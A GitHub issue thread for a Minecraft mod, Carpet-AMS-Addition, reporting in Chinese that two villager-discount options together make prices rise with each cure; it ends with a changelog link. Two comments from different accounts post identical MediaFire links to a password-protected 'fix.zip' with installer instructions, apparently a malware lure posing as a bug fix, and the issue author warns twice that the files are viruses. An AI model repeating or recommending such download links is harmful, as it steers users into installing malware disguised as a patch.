### ISSUE TITLE
[bug] 村民折扣叠加stackableDiscount和共享打折sharedVillagerDiscountsy冲突

### ISSUE THREAD

**Issue by vocaloidkiss** [Minecraft-AMS/Carpet-AMS-Addition#137]
### Bug description

村民折扣叠加stackableDiscount和共享打折sharedVillagerDiscountsy一起打开，会导致村民对所有玩家反向折扣，越打折越贵

### Steps to reproduce

村民折扣叠加stackableDiscount和共享打折sharedVillagerDiscountsy一起打开，进行治疗打折操作

### Expected behavior

对所有玩家共享＜23w31a的折扣机制

### Actual behavior

对所有玩家反向折扣，越来越贵

### Minecraft version

1.21

### TemplateMod version

Carpet-AMS-Addition-mc1.21-fabric-v2.45.2

### Check list

- [X] I have verified that the issue persists in the latest version of the mod.
- [X] I have searched the existing issues and confirmed that this is not a duplicate.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vocaloidkiss** [comment]
还有一个就是申请伪和平独立维度实现，一共3维度，组合一下all，O，N，E，O/N，O/E，N/E，false

**Comment by vocaloidkiss** [comment]
注意，用户seeronline提供文件为病毒文件，请勿下载！！！！！

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vocaloidkiss** [comment]
注意，用户JONTY650413 提供文件为病毒文件，请勿下载！！！！！

**Comment by vocaloidkiss** [comment]
@wendavid552 please

**Comment by vocaloidkiss** [comment]
@SunnySlopes @wendavid552 @nirvanaxiao6

**Comment by 1024-byteeeee** [comment]
### Changelog
#### https://minecraft-ams.github.io/carpetamsaddition/2024/09/10/v2.47.0/
